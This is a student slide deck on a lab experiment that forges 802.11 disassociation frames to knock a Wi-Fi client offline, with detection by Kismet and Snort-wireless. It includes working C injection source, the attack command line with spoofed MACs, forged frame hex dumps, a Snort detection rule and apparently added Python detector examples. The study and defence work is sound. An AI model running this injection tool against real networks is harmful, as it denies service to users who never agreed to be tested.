Attacking and Detection: Deny of Service in Wireless Network by Injecting Disassociation Frames through Data Link Layer Yufei Xu, Xin Wu, Da Teng

Post on 18-Dec-2015



Outline

Introduction

Background

Simulation Design

Setting Up Environment

Experimental Results & Analysis

Conclusion

Introduction

802.11: a set of standards for wireless local area network (WLAN) computer communication.

It concerns the lowest two layers of the OSI model: the Data Link Layer and the Physical Layer.

Many attacks exist: Man-in-the-Middle, DoS, attacks on WEP.

Disassociation attack: one kind of DoS attack.

Background

Architecture of wireless network

Stations: all components that can connect to a wireless medium in a network. All stations are equipped with wireless network interface cards.

Access points (APs): base stations for the wireless network; they transmit and receive radio frequencies for wireless-enabled devices to communicate with.

Background (cont.) Architecture of wireless network

Basic service set (BSS): a set of all stations that can communicate with each other.

Extended service set (ESS): a set of connected BSSes.

Distribution system: connects the APs in an extended service set.

Ad-hoc network: contains no access points.

Background (cont.)

[Figure 1. Infrastructure Network: stations (STA) associate with an AP; BSSes are joined through the Distribution System (DS) into an Extended Service Set (ESS). Figure 2. Ad-hoc Network: laptop and PC communicating with no AP.]

Background (cont.) 802.11 in OSI Model

OSI layers, top to bottom: Application layer, Presentation layer, Session layer, Transport layer, Network layer, Data link layer, Physical layer (over the physical link).

OSI Model: defines a framework for the implementation of networking protocols in 7 layers.

Background (cont.) 802.11 in OSI Model

802.11 standards only concern the data link layer and the physical layer.

The data link layer in 802.11 is subdivided into two sublayers:

Medium Access Control (MAC): a set of rules that defines how to send data and access the wireless medium.

Logical Link Control (LLC): deals with error control, framing, and MAC addressing.

Background (cont.)

Wireless frames: 3 kinds of frames: data frames, management frames, control frames.

Generic 802.11 frame layout (fields in transmission order):

Frame control | Duration/ID | Addr1 | Addr2 | Addr3 | Seq. control | Addr4 | Frame body | FCS

Background (cont.)

Denial of Service (DoS): an action or series of actions that prevents any part of a system from working in conformity to its intention.

DoS attack: makes a computer resource unavailable to its intended users. Two classes: resource allocation attacks and resource destruction attacks.

Background (cont.) Disassociation attack

How does a station connect to a network?

The APs have the responsibility to mediate all wireless traffic in the network.

A station must associate with an AP to join the network. Then it can send data to and get data from the network.

Detailed steps: The AP broadcasts its SSID over the air. A station becomes aware of the wireless network by receiving wireless frames containing such information. Once it gets the SSID from an AP, it must conduct the 802.11 authentication process with that AP prior to any upper-layer authentication such as 802.1X.

Background (cont.)

A station provides its identity to the AP. The AP may grant a station or deny it according to the network configuration, for example, whether the station is in the AP's black list.

802.11 standards define 2 link-level types of authentication: open system and shared key.

They are not mutual, since only the AP authenticates stations, not vice versa.

Data in this process is not encrypted.

The station associates (registers) with the AP to get full access to the network. It sends an Association Request to the AP.

Background (cont.)

The AP grants association and responds with a status code standing for success and the Association ID. Otherwise a response for failure is sent and the procedure ends.

The AP forwards frames to and from the station: the station can communicate with other devices from now on.

Association is logically similar to connecting to a wired network.

A station can only associate with 1 AP at a time, but it may re-associate with another one when connection problems occur, or when it roams within the whole wireless network.

Background (cont.)

The state diagram of authentication and association:

State 1: Unauthenticated, Unassociated --(authentication OK)--> State 2: Authenticated, Unassociated --(association or reassociation OK)--> State 3: Authenticated, Associated

A disassociation frame moves a station from State 3 back to State 2; a deauthentication frame moves it from State 2 or State 3 back to State 1.

What's a disassociation attack?

A fake disassociation frame is generated by the attacker and sent to the victim, with the AP's MAC as the source and the victim's MAC as the destination.

The attacker keeps sending, so the victim stays unavailable to other devices.

It's a kind of DoS attack.

Simulation design

To demonstrate the effect of a disassociation attack, we design our simulations as follows.

Architecture

L2: plays the role of the victim, which receives disassociation frames from the attacker.

L1: serves as a normal machine which sends ping messages in order to get ICMP echo service from the victim L2.

L3: works as an IDS which monitors all traffic over the entire network.

L4: sits outside the network and periodically sends disassociation messages to the intended victim L2.

[Figure: simulation topology with L1 (TESTER), L2 (VICTIM), L3 (DETECTOR) and L4 (ATTACKER).]

Simulation design (cont.) Designed working flow

Let the attacker (L4) keep sending fake disassociation frames to the victim (L2).

Evaluate the victim's availability with the tester (L1), which accesses the victim's echo service. In practice this is done by sending ICMP echo requests and receiving echo responses.

Meanwhile, the IDS (L3) should detect such an attack, raise alarms, and log the frames it captures to dump files.

Change the rate at which the attacker sends disassociation frames to observe how severely the victim is affected.

Analyze the dump files to evaluate how efficiently the IDS detects attacks at different attack frequencies.

Setting up environment Hardware and software configuration

Why choose a Prism-based wireless network card? It is based on the Intersil Prism 2.5 chipset and allows data injection through the data link layer when driven by the HostAP driver. It can also be configured to operate in promiscuous mode to monitor the traffic over the entire network.

Role | Host | OS | Wireless NIC | Driver | Application

AP | D-Link DI-524 802.11g Router | - | - | - | -

Tester (L1) | IBM Thinkpad T61 | Windows Vista Home | Intel Wireless WiFi Link 4965 AGN (802.11a/g/n) | Supported by Vista | -

Victim (L2) | Asus M3NP Laptop | Windows Server 2003 Standard | Netgear WG511 802.11b (based on Prism 54 chipset) | Netgear WG511 Wireless Assistant | -

IDS (L3) | IBM Thinkpad R50 | Red Hat 9 (kernel 2.4.20-8) | SMC 2532W-B 802.11b (based on Prism 2.5 chipset) | HostAP 0.0.4 | 1) Kismet 2006.04.R1 2) Snort-Wireless 2.4.3-alpha04

Attacker (L4) | Toshiba Satellite M30 Laptop | Red Hat 9 (kernel 2.4.20-8) | SMC 2532W-B 802.11b (based on Prism 2.5 chipset) | HostAP 0.0.4 | 1) Libwlan (API) 2) A program based on it

Setting up environment (cont.) Software installations

Constructing the attacker:

Install Red Hat 9 with kernel 2.4.20-8 from the installation CD.

Copy the configuration file /usr/src/linux-2.4.20-8/configs/kernel-2.4.20-i386.config to /usr/src/linux-2.4.20-8/.config.

Download hostap-0.0.4.tar.gz and uncompress it. Edit its Makefile and hostap_cs.c, changing some values to match this computer.

Install hostap by executing make pccard and then make install_pccard.

Download libwlan-0.1.tar.gz and install it.

Code a program based on libwlan and compile it. This program works as the attack tool.

Constructing the detector:

Install the OS and drivers as for the attacker (L4). Install Kismet 2006 as the IDS and configure it.

(Please refer to the report for installation details.)

Experimental Results And Analysis

Procedures for conducting experiments:

Start Kismet first on the detector (L3) side by typing the following commands:

cd /root
ifconfig wlan0 promisc
kismet

The tester (L1) starts testing by pinging the victim (L2) and another machine:

ping 192.168.1.103 -t    (victim's IP)
ping 192.168.1.1 -t      (third party's IP)

The attacker (L4) starts attacking by running our program (for details, please refer to the appendix of source code) with the following command:

./deassoci wlan0ap 00:11:95:75:23:9a 00:09:5b:83:f8:9c 00:11:95:75:23:9a

Where: the first MAC is the BSSID of the network, the second MAC is the victim's MAC, and the third MAC is the spoofed MAC used by the attacker (the attacker pretends to be the real AP when sending disassociation frames to the victim).

Experimental Results And Analysis (Cont.)

Procedures for conducting experiments (Cont.):

Check what happens on the tester (L1) side. When the attacking program finishes execution, we stop Kismet.

Use snort-wireless to interpret the dump file created by Kismet:

snort -X -w -c disassociation.rule -r Kismet-01-nov-2007-1.dump

snort -X -w -r /var/log/snort/snort-99833875.dump > /root/dissassoc_rate_02.log

Repeat the above process at different rates of sending the disassociation frames.

Experimental Results And Analysis (Cont.)

Before attacking, on the tester's side we observe:

The tester, at IP 192.168.1.101, can successfully ping both the third party (above) and the victim (below).

Experimental Results And Analysis (Cont.)

When we send the disassociation frames at a rate of 5 frames/second, on the tester's side we observe:

The tester, at IP 192.168.1.101, is still able to ping the third party (above). However, it can't ping the victim at 192.168.1.103 (shown below).

Experimental Results And Analysis (Cont.)

Furthermore, when we send the disassociation frames at 1 frame/second and 1 frame/10 seconds respectively, they have no effect on the tester pinging the third party, but do affect pinging the victim.

The former refers to the rate of 1 frame/second, the latter to 1 frame/10 seconds.

Experimental Results And Analysis (Cont.)

On the other hand, Kismet, as an IDS, shows the following display at the rate of 5 frames/second.

It explicitly alarms that there is a "de-authentication/disassociation" flood on 00:00:00:00:00:00.

MAC 00:00:00:00:00:00 here means a network BSSID.

Experimental Results And Analysis (Cont.)

Regarding sending disassociation frames at a rate of 1 frame/second, Kismet displays:

In this situation, Kismet reports a suspicious disassociation frame from MAC 00:11:95:75:23:9A.

MAC 00:11:95:75:23:9A here is the source of the disassociation frames.

Experimental Results And Analysis (Cont.)

Why does Kismet generate different reports for these two situations?

The reason is again the rate at which disassociation frames are sent.

At a high rate, say 5 frames/second, Kismet recognizes an absolutely abnormal situation and reports a disassociation flood on network 00:00:00:00:00:00.

At a relatively lower rate, for instance 1 frame/second in our case (still high compared with the normal situation), Kismet generates an alarm questioning disassociation frames from a particular source (MAC 00:11:95:75:23:9A).
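As an added example (not part of the original slides, and not Kismet's own logic), a small rate-based detector in Python that reproduces the two behaviours described above: a per-frame "suspicious" alert at low rates, and a single "flood" alert once the count inside a sliding window crosses a threshold. The window length, the threshold and the timestamped sample events are all assumptions constructed for this example.

```python
from collections import deque

# Constructed sample: (seconds since capture start, claimed source MAC) for each
# disassociation frame a monitor saw. The first burst imitates the 5 frames/second
# run of the experiment, the tail imitates the 1 frame/second run.
SAMPLE_EVENTS = [
    (0.0, "00:11:95:75:23:9a"), (0.2, "00:11:95:75:23:9a"),
    (0.4, "00:11:95:75:23:9a"), (0.6, "00:11:95:75:23:9a"),
    (0.8, "00:11:95:75:23:9a"), (1.0, "00:11:95:75:23:9a"),
    (10.0, "00:11:95:75:23:9a"), (11.0, "00:11:95:75:23:9a"),
    (12.0, "00:11:95:75:23:9a"),
]

WINDOW_SECONDS = 1.0   # assumption: length of the sliding window
FLOOD_THRESHOLD = 3    # assumption: frames per window that count as a flood


def classify_disassoc(events, window=WINDOW_SECONDS, threshold=FLOOD_THRESHOLD):
    """Return a list of (timestamp, verdict, source) alerts.

    Every disassociation frame is at least SUSPICIOUS and named by source; once
    `threshold` frames fall inside `window` seconds one FLOOD alert is raised for
    the burst and the remaining frames of that burst are swallowed.
    """
    recent = deque()   # timestamps inside the current window
    alerts = []
    flooding = False
    for ts, src in sorted(events):
        recent.append(ts)
        while ts - recent[0] > window:
            recent.popleft()
        if len(recent) >= threshold:
            if not flooding:
                alerts.append((ts, "FLOOD", src))
                flooding = True
        else:
            flooding = False
            alerts.append((ts, "SUSPICIOUS", src))
    return alerts


def frames_per_source(events):
    """Count frames per claimed source, the figure Kismet names in its alert."""
    counts = {}
    for _, src in events:
        counts[src] = counts.get(src, 0) + 1
    return counts


if __name__ == "__main__":
    for ts, verdict, src in classify_disassoc(SAMPLE_EVENTS):
        print(f"t={ts:5.1f}s {verdict:10s} src={src}")
    print(frames_per_source(SAMPLE_EVENTS))
```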

Experimental Results And Analysis (Cont.)

Why does Kismet report a disassociation flood on the network with BSSID 00:00:00:00:00:00 when we send disassociation frames at a rate of 5 frames/second?

This can be answered from the actual disassociation frames we sent over the network:

0x0000: A0 08 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A
0x0010: 00 00 00 00 00 00 F0 6B 05 00

The first two bytes "A0 08" are the frame control field and mark this as a disassociation frame. The next two bytes "02 01" are the duration/ID, used to calculate the value of the NAV. The following six bytes "00 09 5B 83 F8 9C" are the destination's MAC, which is the victim's MAC. The subsequent six bytes "00 11 95 75 23 9A" are the source's MAC, from which this frame is sent.

Experimental Results And Analysis (Cont.)

The following six bytes "00 00 00 00 00 00" are the network's BSSID.

The next two bytes "F0 6B" are used for sequence control. The last two bytes "05 00" represent the reason why this disassociation frame is sent.

From the above illustration of the frame's format, it is rational that when Kismet reports a disassociation flood suffered by a network, it refers to the BSSID (00:00:00:00:00:00) carried in these frames.
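As an added example (not part of the original slides), a Python parser that walks the 26-byte disassociation frames from the slide and Appendix 3 field by field, following the IEEE 802.11 frame control bit layout. The reason-code texts are the standard's wording, abbreviated; the `sa_matches_bssid` field is a consistency check a monitor can apply, because a disassociation genuinely sent by an infrastructure AP carries the AP's MAC as both source address and BSSID.

```python
import struct

# Frames copied from the slide / Appendix 3 (captured by Kismet in the experiment).
FRAME_1 = bytes.fromhex("A0 08 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A "
                        "00 00 00 00 00 00 F0 6B 05 00")
FRAME_3 = bytes.fromhex("A0 00 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A "
                        "00 00 00 00 00 00 00 6C 05 00")

MGMT_SUBTYPES = {10: "disassociation", 12: "deauthentication"}
# Reason codes from IEEE 802.11 (abbreviated); 5 is WLAN_REASON_DISASSOC_AP_BUSY.
REASON_CODES = {1: "unspecified", 2: "previous authentication no longer valid",
                5: "AP unable to handle all associated STAs", 8: "STA leaving BSS"}


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def parse_disassoc(frame: bytes) -> dict:
    """Decode an 802.11 management header plus the 2-byte disassoc/deauth body."""
    if len(frame) < 26:
        raise ValueError("need at least 24-byte header + 2-byte reason code")
    fc0, fc1 = frame[0], frame[1]
    ftype = (fc0 >> 2) & 0x03             # 0 = management, 1 = control, 2 = data
    subtype = (fc0 >> 4) & 0x0F
    if ftype != 0 or subtype not in MGMT_SUBTYPES:
        raise ValueError(f"not a disassoc/deauth frame: type={ftype} subtype={subtype}")
    duration = struct.unpack_from("<H", frame, 2)[0]
    da, sa, bssid = frame[4:10], frame[10:16], frame[16:22]   # Addr1, Addr2, Addr3
    seq_ctl = struct.unpack_from("<H", frame, 22)[0]
    reason = struct.unpack_from("<H", frame, 24)[0]
    return {
        "kind": MGMT_SUBTYPES[subtype],
        "retry": bool(fc1 & 0x08),        # Kismet prints this as "Flags: Re"
        "duration_us": duration,
        "dst": mac_str(da), "src": mac_str(sa), "bssid": mac_str(bssid),
        "fragment": seq_ctl & 0x0F,
        "sequence": seq_ctl >> 4,
        "reason_code": reason,
        "reason": REASON_CODES.get(reason, "reserved/unknown"),
        # A real AP sends disassociations with SA == BSSID; a mismatch is a red flag.
        "sa_matches_bssid": sa == bssid,
    }


if __name__ == "__main__":
    for name, frame in (("frame 1", FRAME_1), ("frame 3", FRAME_3)):
        print(name, parse_disassoc(frame))
```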

Experimental Results And Analysis (Cont.)

Finally, when we use snort-wireless to interpret the dump files created by Kismet for the rates 1 frame/second and 5 frames/second respectively, we observe:

For the rate of 1 frame/second, snort-wireless reports that 801 such disassociation frames were captured by Kismet.

For the rate of 5 frames/second, snort-wireless reports that 720 such frames were logged by Kismet.

Consequently, from the above observation we can infer that Kismet's logging capability is also related to the rate at which disassociation frames are sent.

Conclusions

Experimental results indicate the following conclusions:

The severity that a victim suffers from the attack is proportional to the rate at which the disassociation frames are sent. As the rate of disassociation frames increases, the victim is more severely affected.

Kismet has the ability to report the severity of the attack based on detecting the rate at which the disassociation frames are sent.

The capturing ability of Kismet, as an IDS, is also related to the rate at which the disassociation frames are sent. At a relatively high rate, Kismet can't capture all the disassociation frames.

Appendix 1 – source code

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <libwlan.h>

int main(int argc, char *argv[]) {
    int s, *len, i, j;
    const char *iface = NULL;               // interface referred to by the established socket
    struct ieee80211_mgmt mgmt;             // structure for management frame defined in Libwlan
    char *bssid_addr, *dst_addr, *src_addr; // bssid, destination mac, source mac supplied on the command line
    u_char *bssid, *dst_mac, *src_mac;      // converted bssid, destination mac, source mac as raw bytes

    if (argc != 5) {                        // improper input supplied by user
        printf("Usage: %s <wlan#ap> <bssid_address> <dst_address> <src_address>\n", argv[0]);
        printf("Example: %s wlan0ap 00:01:23:45:0A 00:01:23:45:0A 00:02:4C:00:00\n", argv[0]);
        exit(-1);
    } else {
        iface = argv[1];                    // store the interface
        bssid_addr = argv[2];               // store the bssid
        dst_addr = argv[3];                 // store the destination mac
        src_addr = argv[4];                 // store the source mac
    }

    s = socket_init(iface);                 // construct the socket for sending frames
    len = malloc(sizeof(int));
    bssid = lib_hex_aton(bssid_addr, len);  // convert the bssid into raw bytes
    dst_mac = lib_hex_aton(dst_addr, len);  // convert the destination mac into raw bytes
    src_mac = lib_hex_aton(src_addr, len);  // convert the source mac into raw bytes

    for (j = 1; j <= 100; j++) {
        for (i = 1; i <= 10; i++) {
            mgmt = build_disassoc(dst_mac, src_mac, bssid, WLAN_REASON_DISASSOC_AP_BUSY); // construct the disassociation frame
            if (send(s, &mgmt, IEEE80211_HDRLEN + sizeof(mgmt.u.disassoc), 0) < 0) {
                perror("send: ");
                sleep(1);
            }
            //usleep(200000);
            sleep(10);
        }
        printf("Progression status: %.1f %%\n", j / 100.0 * 100);
    }
    close(s);
    return 0;
}

Appendix 2 – Rule for Snort-wireless

alert wifi 00:11:95:75:23:9A -> 00:09:5B:83:F8:9C (msg: "Disassociation Attack"; type: TYPE_MANAGEMENT; stype: STYPE_DISASSOC;)

Appendix 3 – Disassociation Frames

11/01-22:55:23.268612 Dissassoc. 0:11:95:75:23:9A -> 0:9:5B:83:F8:9C bssid: 0:0:0:0:0:0 Flags: Re
0x0000: A0 08 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A ......[......u#.
0x0010: 00 00 00 00 00 00 F0 6B 05 00 .......k..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/01-22:55:23.363666 Dissassoc. 0:11:95:75:23:9A -> 0:9:5B:83:F8:9C bssid: 0:0:0:0:0:0 Flags: Re
0x0000: A0 08 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A ......[......u#.
0x0010: 00 00 00 00 00 00 F0 6B 05 00 .......k..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/01-22:55:23.455478 Dissassoc. 0:11:95:75:23:9A -> 0:9:5B:83:F8:9C bssid: 0:0:0:0:0:0 Flags:
0x0000: A0 00 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A ......[......u#.
0x0010: 00 00 00 00 00 00 00 6C 05 00 .......l..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Appendix 4 – Alerts by Snort-wireless

[**] [1:0:0] Disassociation Attack [**] 11/01-21:06:36.936921
[**] [1:0:0] Disassociation Attack [**] 11/01-21:06:38.812559
[**] [1:0:0] Disassociation Attack [**] 11/01-21:06:38.815930
[**] [1:0:0] Disassociation Attack [**] 11/01-21:06:38.880704
[**] [1:0:0] Disassociation Attack [**] 11/01-21:06:39.822643
[**] [1:0:0] Disassociation Attack [**] 11/01-21:06:39.921190


Question Period

Any Questions?